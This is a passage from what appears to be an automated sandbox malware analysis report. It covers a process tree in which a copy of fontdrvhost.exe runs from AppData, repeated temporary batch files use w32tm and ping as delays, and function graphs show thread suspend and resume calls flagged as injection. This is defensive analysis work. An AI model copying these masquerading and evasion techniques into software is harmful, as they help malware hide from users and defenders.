                                                                  Commandline:w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                                  Imagebase:0x7ff703d60000
                                                                  File size:108'032 bytes
                                                                  MD5 hash:81A82132737224D324A3E8DA993E2FB5
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:34
                                                                  Start time:07:37:28
                                                                  Start date:29/03/2024
                                                                  Path:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Users\user\AppData\Local\fontdrvhost.exe"
                                                                  Imagebase:0x6c0000
                                                                  File size:3'672'576 bytes
                                                                  MD5 hash:4164D5955C244FF266C1CC41013FE21A
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:35
                                                                  Start time:07:37:30
                                                                  Start date:29/03/2024
                                                                  Path:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Users\user\AppData\Local\fontdrvhost.exe"
                                                                  Imagebase:0x5e0000
                                                                  File size:3'672'576 bytes
                                                                  MD5 hash:4164D5955C244FF266C1CC41013FE21A
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:37
                                                                  Start time:07:37:31
                                                                  Start date:29/03/2024
                                                                  Path:C:\Windows\System32\cmd.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\ZMh4UPVO0I.bat"
                                                                  Imagebase:0x7ff6f6770000
                                                                  File size:289'792 bytes
                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:38
                                                                  Start time:07:37:31
                                                                  Start date:29/03/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff7699e0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:39
                                                                  Start time:07:37:31
                                                                  Start date:29/03/2024
                                                                  Path:C:\Windows\System32\chcp.com
                                                                  Wow64 process (32bit):false
                                                                  Commandline:chcp 65001
                                                                  Imagebase:0x7ff6a54a0000
                                                                  File size:14'848 bytes
                                                                  MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:40
                                                                  Start time:07:37:31
                                                                  Start date:29/03/2024
                                                                  Path:C:\Windows\System32\w32tm.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                                  Imagebase:0x7ff703d60000
                                                                  File size:108'032 bytes
                                                                  MD5 hash:81A82132737224D324A3E8DA993E2FB5
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:41
                                                                  Start time:07:37:36
                                                                  Start date:29/03/2024
                                                                  Path:C:\Windows\System32\cmd.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\I3W1TCNLwG.bat"
                                                                  Imagebase:0x7ff6f6770000
                                                                  File size:289'792 bytes
                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:42
                                                                  Start time:07:37:37
                                                                  Start date:29/03/2024
                                                                  Path:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Users\user\AppData\Local\fontdrvhost.exe"
                                                                  Imagebase:0x7ff72bec0000
                                                                  File size:3'672'576 bytes
                                                                  MD5 hash:4164D5955C244FF266C1CC41013FE21A
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:43
                                                                  Start time:07:37:37
                                                                  Start date:29/03/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff7699e0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:44
                                                                  Start time:07:37:38
                                                                  Start date:29/03/2024
                                                                  Path:C:\Windows\System32\chcp.com
                                                                  Wow64 process (32bit):false
                                                                  Commandline:chcp 65001
                                                                  Imagebase:0x7ff6a54a0000
                                                                  File size:14'848 bytes
                                                                  MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:45
                                                                  Start time:07:37:38
                                                                  Start date:29/03/2024
                                                                  Path:C:\Windows\System32\PING.EXE
                                                                  Wow64 process (32bit):false
                                                                  Commandline:ping -n 10 localhost
                                                                  Imagebase:0x7ff690150000
                                                                  File size:22'528 bytes
                                                                  MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:47
                                                                  Start time:07:37:40
                                                                  Start date:29/03/2024
                                                                  Path:C:\Windows\System32\cmd.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\7nxekELsf0.bat"
                                                                  Imagebase:0x7ff6f6770000
                                                                  File size:289'792 bytes
                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:48
                                                                  Start time:07:37:40
                                                                  Start date:29/03/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff7699e0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:49
                                                                  Start time:07:37:41
                                                                  Start date:29/03/2024
                                                                  Path:C:\Windows\System32\chcp.com
                                                                  Wow64 process (32bit):false
                                                                  Commandline:chcp 65001
                                                                  Imagebase:0x7ff6a54a0000
                                                                  File size:14'848 bytes
                                                                  MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:50
                                                                  Start time:07:37:41
                                                                  Start date:29/03/2024
                                                                  Path:C:\Windows\System32\PING.EXE
                                                                  Wow64 process (32bit):false
                                                                  Commandline:ping -n 10 localhost
                                                                  Imagebase:0x7ff690150000
                                                                  File size:22'528 bytes
                                                                  MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:51
                                                                  Start time:07:37:48
                                                                  Start date:29/03/2024
                                                                  Path:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Users\user\AppData\Local\fontdrvhost.exe"
                                                                  Imagebase:0x7b0000
                                                                  File size:3'672'576 bytes
                                                                  MD5 hash:4164D5955C244FF266C1CC41013FE21A
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:52
                                                                  Start time:07:37:50
                                                                  Start date:29/03/2024
                                                                  Path:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Users\user\AppData\Local\fontdrvhost.exe"
                                                                  Imagebase:0x80000
                                                                  File size:3'672'576 bytes
                                                                  MD5 hash:4164D5955C244FF266C1CC41013FE21A
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:54
                                                                  Start time:07:37:54
                                                                  Start date:29/03/2024
                                                                  Path:C:\Windows\System32\cmd.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\Gu3WPocxsu.bat"
                                                                  Imagebase:0x7ff6f6770000
                                                                  File size:289'792 bytes
                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:55
                                                                  Start time:07:37:54
                                                                  Start date:29/03/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff7699e0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:56
                                                                  Start time:07:37:54
                                                                  Start date:29/03/2024
                                                                  Path:C:\Windows\System32\chcp.com
                                                                  Wow64 process (32bit):false
                                                                  Commandline:chcp 65001
                                                                  Imagebase:0x7ff6a54a0000
                                                                  File size:14'848 bytes
                                                                  MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:57
                                                                  Start time:07:37:54
                                                                  Start date:29/03/2024
                                                                  Path:C:\Windows\System32\w32tm.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                                  Imagebase:0x7ff703d60000
                                                                  File size:108'032 bytes
                                                                  MD5 hash:81A82132737224D324A3E8DA993E2FB5
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:58
                                                                  Start time:07:38:00
                                                                  Start date:29/03/2024
                                                                  Path:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Users\user\AppData\Local\fontdrvhost.exe"
                                                                  Imagebase:0xb0000
                                                                  File size:3'672'576 bytes
                                                                  MD5 hash:4164D5955C244FF266C1CC41013FE21A
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:59
                                                                  Start time:07:38:02
                                                                  Start date:29/03/2024
                                                                  Path:C:\Windows\System32\cmd.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\3IMqqsTTOd.bat"
                                                                  Imagebase:0x7ff6f6770000
                                                                  File size:289'792 bytes
                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:60
                                                                  Start time:07:38:02
                                                                  Start date:29/03/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff7699e0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Disassembly

                                                                  Reset < >

                                                                    Execution Graph

                                                                    Execution Coverage:5.6%
                                                                    Dynamic/Decrypted Code Coverage:83.3%
                                                                    Signature Coverage:0%
                                                                    Total number of Nodes:12
                                                                    Total number of Limit Nodes:0
                                                                    execution_graph 26128 7ffd9bbd02f9 26129 7ffd9bbd0307 FindCloseChangeNotification 26128->26129 26131 7ffd9bbd03e4 26129->26131 26132 7ffd9bbd1f85 26133 7ffd9bbd1f9f GetFileAttributesW 26132->26133 26135 7ffd9bbd2065 26133->26135 26124 7ffd9bbceaad 26125 7ffd9bbceabb SuspendThread 26124->26125 26127 7ffd9bbceb94 26125->26127 26136 7ffd9bbd0190 26137 7ffd9bbd019a ResumeThread 26136->26137 26139 7ffd9bbd02a4 26137->26139

                                                                    Executed Functions

                                                                    Function 00007FFD9C0F78B0 Relevance: .9, Instructions: 878COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 353 7ffd9c0f78b0-7ffd9c0f78ca 354 7ffd9c0f7ecc-7ffd9c0f7eda 353->354 355 7ffd9c0f78d0-7ffd9c0f78e0 353->355 358 7ffd9c0f7edc 354->358 359 7ffd9c0f7ee1-7ffd9c0f7ef0 354->359 356 7ffd9c0f7f2a-7ffd9c0f7f77 355->356 357 7ffd9c0f78e6-7ffd9c0f7921 355->357 364 7ffd9c0f7f79-7ffd9c0f7f9d 356->364 365 7ffd9c0f7fc1-7ffd9c0f801c 356->365 363 7ffd9c0f79ba-7ffd9c0f79c2 357->363 358->359 366 7ffd9c0f79c8 363->366 367 7ffd9c0f7926-7ffd9c0f792f 363->367 375 7ffd9c0f8066-7ffd9c0f806b 365->375 376 7ffd9c0f801e-7ffd9c0f8042 365->376 368 7ffd9c0f79d2-7ffd9c0f79ef 366->368 367->356 369 7ffd9c0f7935-7ffd9c0f7940 367->369 374 7ffd9c0f79f6-7ffd9c0f7a07 368->374 372 7ffd9c0f79ca-7ffd9c0f79ce 369->372 373 7ffd9c0f7946-7ffd9c0f795a 369->373 372->368 377 7ffd9c0f795c-7ffd9c0f7973 373->377 378 7ffd9c0f79b3-7ffd9c0f79b7 373->378 386 7ffd9c0f7a09-7ffd9c0f7a1e 374->386 387 7ffd9c0f7a20-7ffd9c0f7a2f 374->387 380 7ffd9c0f8074-7ffd9c0f812b 375->380 381 7ffd9c0f806d 375->381 377->356 379 7ffd9c0f7979-7ffd9c0f7985 377->379 378->363 384 7ffd9c0f7987-7ffd9c0f799b 379->384 385 7ffd9c0f799f-7ffd9c0f79b0 379->385 409 7ffd9c0f812d-7ffd9c0f8136 call 7ffd9c0f63f0 380->409 381->380 384->377 389 7ffd9c0f799d 384->389 385->378 386->387 396 7ffd9c0f7a51-7ffd9c0f7abe 387->396 397 7ffd9c0f7a31-7ffd9c0f7a4c 387->397 389->378 411 7ffd9c0f7b0f-7ffd9c0f7b56 396->411 412 7ffd9c0f7ac0-7ffd9c0f7ad3 396->412 406 7ffd9c0f7e89-7ffd9c0f7eba 397->406 421 7ffd9c0f7ebc-7ffd9c0f7ec6 406->421 417 7ffd9c0f8117-7ffd9c0f811d 409->417 422 7ffd9c0f7b5a 411->422 412->356 416 7ffd9c0f7ad9-7ffd9c0f7b07 412->416 426 7ffd9c0f7b08-7ffd9c0f7b0d 416->426 421->354 421->355 424 7ffd9c0f7b5c-7ffd9c0f7b7b 422->424 425 7ffd9c0f7b91 422->425 431 7ffd9c0f7bec-7ffd9c0f7bfd 424->431 432 7ffd9c0f7b7d-7ffd9c0f7b81 424->432 428 7ffd9c0f7bac-7ffd9c0f7bbd 425->428 426->412 427 7ffd9c0f7b0e 426->427 427->411 433 7ffd9c0f7c07-7ffd9c0f7c0b 428->433 434 7ffd9c0f7bbf-7ffd9c0f7bcd 428->434 435 7ffd9c0f7bfe-7ffd9c0f7c01 431->435 432->426 440 7ffd9c0f7b83 432->440 439 7ffd9c0f7c0d-7ffd9c0f7c0f 433->439 437 7ffd9c0f7bcf-7ffd9c0f7bd3 434->437 438 7ffd9c0f7c3e-7ffd9c0f7c53 434->438 435->433 437->422 446 7ffd9c0f7bd5 437->446 442 7ffd9c0f7c59-7ffd9c0f7c61 438->442 439->442 443 7ffd9c0f7c11-7ffd9c0f7c1f 439->443 440->425 444 7ffd9c0f7cab-7ffd9c0f7cb3 442->444 445 7ffd9c0f7c63-7ffd9c0f7c6c 442->445 447 7ffd9c0f7c21-7ffd9c0f7c25 443->447 448 7ffd9c0f7c90-7ffd9c0f7ca5 443->448 451 7ffd9c0f7d3b-7ffd9c0f7d49 444->451 452 7ffd9c0f7cb9-7ffd9c0f7cd2 444->452 449 7ffd9c0f7c6f-7ffd9c0f7c71 445->449 446->431 447->428 455 7ffd9c0f7c27 447->455 448->444 453 7ffd9c0f7c73-7ffd9c0f7c75 449->453 454 7ffd9c0f7ce2-7ffd9c0f7ce4 449->454 456 7ffd9c0f7d4b-7ffd9c0f7d4d 451->456 457 7ffd9c0f7dba-7ffd9c0f7dbb 451->457 452->451 458 7ffd9c0f7cd4-7ffd9c0f7cd5 452->458 460 7ffd9c0f7c77 453->460 461 7ffd9c0f7cf1-7ffd9c0f7cf5 453->461 467 7ffd9c0f7ce5-7ffd9c0f7ce7 454->467 455->438 463 7ffd9c0f7dc9-7ffd9c0f7dcb 456->463 464 7ffd9c0f7d4f 456->464 462 7ffd9c0f7deb-7ffd9c0f7ded 457->462 465 7ffd9c0f7cd6-7ffd9c0f7ce0 458->465 460->435 468 7ffd9c0f7c79 460->468 469 7ffd9c0f7cf7 461->469 470 7ffd9c0f7d71-7ffd9c0f7d8b 461->470 471 7ffd9c0f7def 462->471 472 7ffd9c0f7e5e-7ffd9c0f7e87 462->472 473 7ffd9c0f7e3c 463->473 474 7ffd9c0f7dcd-7ffd9c0f7dcf 463->474 464->465 466 7ffd9c0f7d51 464->466 465->454 477 7ffd9c0f7d58-7ffd9c0f7d5c 466->477 490 7ffd9c0f7d68-7ffd9c0f7d70 467->490 491 7ffd9c0f7ce8 467->491 479 7ffd9c0f7c7e-7ffd9c0f7c84 468->479 469->479 481 7ffd9c0f7cf9 469->481 505 7ffd9c0f7dbd-7ffd9c0f7dc6 470->505 506 7ffd9c0f7d8d-7ffd9c0f7d9b 470->506 482 7ffd9c0f7e0c-7ffd9c0f7e1a 471->482 472->406 483 7ffd9c0f7ead-7ffd9c0f7eba 473->483 484 7ffd9c0f7e3e-7ffd9c0f7e40 473->484 475 7ffd9c0f7e4b-7ffd9c0f7e4f 474->475 476 7ffd9c0f7dd1 474->476 486 7ffd9c0f7ecb 475->486 487 7ffd9c0f7e51 475->487 476->477 485 7ffd9c0f7dd3 476->485 488 7ffd9c0f7dd8-7ffd9c0f7dde 477->488 489 7ffd9c0f7d5e 477->489 494 7ffd9c0f7d00-7ffd9c0f7d25 479->494 504 7ffd9c0f7c86 479->504 481->494 495 7ffd9c0f7e1b-7ffd9c0f7e25 482->495 483->421 484->421 496 7ffd9c0f7e42 484->496 485->488 486->354 487->488 501 7ffd9c0f7e53 487->501 507 7ffd9c0f7e5a-7ffd9c0f7e5d 488->507 508 7ffd9c0f7de0 488->508 489->467 502 7ffd9c0f7d60 489->502 490->470 491->449 498 7ffd9c0f7ce9-7ffd9c0f7cea 491->498 513 7ffd9c0f7d28-7ffd9c0f7d39 494->513 499 7ffd9c0f7e27-7ffd9c0f7e3a 495->499 496->463 500 7ffd9c0f7e44 496->500 498->461 499->473 500->475 501->507 502->490 504->439 509 7ffd9c0f7c88 504->509 505->463 506->482 510 7ffd9c0f7d9d-7ffd9c0f7d9f 506->510 507->472 508->499 512 7ffd9c0f7de2-7ffd9c0f7dea 508->512 509->448 510->495 515 7ffd9c0f7da1 510->515 512->462 513->451 513->458 515->513 516 7ffd9c0f7da3 515->516 516->457
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1682547207.00007FFD9C0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd9c0f0000_ZT3pxe2Tb4.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 1b508982368c642eba7219bac35a4a6b2707dd408da351533068f4af504ad912
                                                                    • Instruction ID: 0c2909b1b9351cf4c2862ec59c4c835431c26d608a4f9efc6fcc317cd9cccb25
                                                                    • Opcode Fuzzy Hash: 1b508982368c642eba7219bac35a4a6b2707dd408da351533068f4af504ad912
                                                                    • Instruction Fuzzy Hash: 3352D530B0864A8FDBA8DB5CC865AB977F1FF55354F1401B9D04EC7292DB25AC86CB81
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BA10DA8 Relevance: .3, Instructions: 300COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 986 7ffd9ba10da8-7ffd9ba10dbf 987 7ffd9ba10dc1 986->987 988 7ffd9ba10dc2-7ffd9ba10df9 986->988 987->988 990 7ffd9ba10e00-7ffd9ba10eb7 call 7ffd9ba107d0 988->990 991 7ffd9ba10dfb 988->991 1004 7ffd9ba10ecf-7ffd9ba10fa8 990->1004 1005 7ffd9ba10eb9-7ffd9ba10ece 990->1005 991->990 1018 7ffd9ba10fc0-7ffd9ba10fc1 1004->1018 1019 7ffd9ba10faa-7ffd9ba10fb0 1004->1019 1005->1004 1020 7ffd9ba10fb2 1018->1020 1021 7ffd9ba10fc3-7ffd9ba10fe3 1018->1021 1019->1020 1023 7ffd9ba10fbf 1020->1023 1024 7ffd9ba10fb4-7ffd9ba10fbe 1020->1024 1025 7ffd9ba10feb-7ffd9ba110dc 1021->1025 1023->1018 1024->1023
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1671529877.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd9ba10000_ZT3pxe2Tb4.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: babceeee4b7a431c33a8d3800ee17318d55c02df3cdbb03e56458236d682ef66
                                                                    • Instruction ID: 98b2f5ef3adab451bc302d28e23194742963f959d2c21011d2e37c9c6ba83c28
                                                                    • Opcode Fuzzy Hash: babceeee4b7a431c33a8d3800ee17318d55c02df3cdbb03e56458236d682ef66
                                                                    • Instruction Fuzzy Hash: B2A1E175A0DA8D8FE7A4DB68C865BA97FE1FF55710F0401BAD049D72EACA792801CB00
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BA10B47 Relevance: 2.6, Strings: 2, Instructions: 73COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1671529877.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd9ba10000_ZT3pxe2Tb4.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: c9$!k9
                                                                    • API String ID: 0-3254877420
                                                                    • Opcode ID: 22350f7d061806a2cc0dd3210212b5e1ff18dbde5dfcc961335287d38e3abbf8
                                                                    • Instruction ID: b8f4c3c407a6d67f423d99870eb1bb2d3fc0ad67ddfee361f68374defe479e95
                                                                    • Opcode Fuzzy Hash: 22350f7d061806a2cc0dd3210212b5e1ff18dbde5dfcc961335287d38e3abbf8
                                                                    • Instruction Fuzzy Hash: 5C11DF32A2964E8FCB44EF2CE8915E9B7E0FF59325F0102BAF849D3250DB30A555CB81
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BBD0190 Relevance: 1.7, APIs: 1, Instructions: 160threadCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 8 7ffd9bbd0190-7ffd9bbd01c9 10 7ffd9bbd01cb 8->10 11 7ffd9bbd01cc-7ffd9bbd02a2 ResumeThread 8->11 10->11 15 7ffd9bbd02aa-7ffd9bbd02f4 11->15 16 7ffd9bbd02a4 11->16 16->15
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1674632989.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd9bbc0000_ZT3pxe2Tb4.jbxd
                                                                    Similarity
                                                                    • API ID: ResumeThread
                                                                    • String ID:
                                                                    • API String ID: 947044025-0
                                                                    • Opcode ID: 1107a0332a656e9b1be902e0ef182600c00819c1f6a23de7f88b2b0728e9d645
                                                                    • Instruction ID: e46685a645714861cad2a22ca7902d618a0e8b86405d730945b1ca1ccb76f252
                                                                    • Opcode Fuzzy Hash: 1107a0332a656e9b1be902e0ef182600c00819c1f6a23de7f88b2b0728e9d645
                                                                    • Instruction Fuzzy Hash: BA516D7090D78C8FDB55DFA8D894AE9BFF0EF56310F1441ABD049D7292CA359846CB11
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BBD02F9 Relevance: 1.6, APIs: 1, Instructions: 143COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1674632989.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd9bbc0000_ZT3pxe2Tb4.jbxd
                                                                    Similarity
                                                                    • API ID: ChangeCloseFindNotification
                                                                    • String ID:
                                                                    • API String ID: 2591292051-0
                                                                    • Opcode ID: ee8bfb53012f9eec2673478652ccfe27bf280ebbaa0da9a6617dd30a4a0f4bd3
                                                                    • Instruction ID: ad2b8893f38e142afdff895d0f40a7e6830cd7b4c21b46846f1f51f6d6db5b3b
                                                                    • Opcode Fuzzy Hash: ee8bfb53012f9eec2673478652ccfe27bf280ebbaa0da9a6617dd30a4a0f4bd3
                                                                    • Instruction Fuzzy Hash: 6B417F70E0865C8FDB59DFA8C895BECBBF0FF5A310F1041AAD049D7292DA74A885CB01
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BBCEAAD Relevance: 1.6, APIs: 1, Instructions: 141threadinjectionCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 29 7ffd9bbceaad-7ffd9bbceab9 30 7ffd9bbceabb-7ffd9bbceac3 29->30 31 7ffd9bbceac4-7ffd9bbceb92 SuspendThread 29->31 30->31 35 7ffd9bbceb9a-7ffd9bbcebe4 31->35 36 7ffd9bbceb94 31->36 36->35
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1674632989.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd9bbc0000_ZT3pxe2Tb4.jbxd
                                                                    Similarity
                                                                    • API ID: SuspendThread
                                                                    • String ID:
                                                                    • API String ID: 3178671153-0
                                                                    • Opcode ID: 4b33957d704c2c84afbc5b850e51fee2ae37fba60ef37078e4ac418fd46e6f8f
                                                                    • Instruction ID: af765283b512a785c962395346c2a7b8ff276e3cffc0a86cc61482aa5308ed19
                                                                    • Opcode Fuzzy Hash: 4b33957d704c2c84afbc5b850e51fee2ae37fba60ef37078e4ac418fd46e6f8f
                                                                    • Instruction Fuzzy Hash: 03416C30E0864C8FDB58EFA8D895AEDBBF0FB5A310F10416AD449E7292DA35A845CB40
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BBD1F85 Relevance: 1.6, APIs: 1, Instructions: 135COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
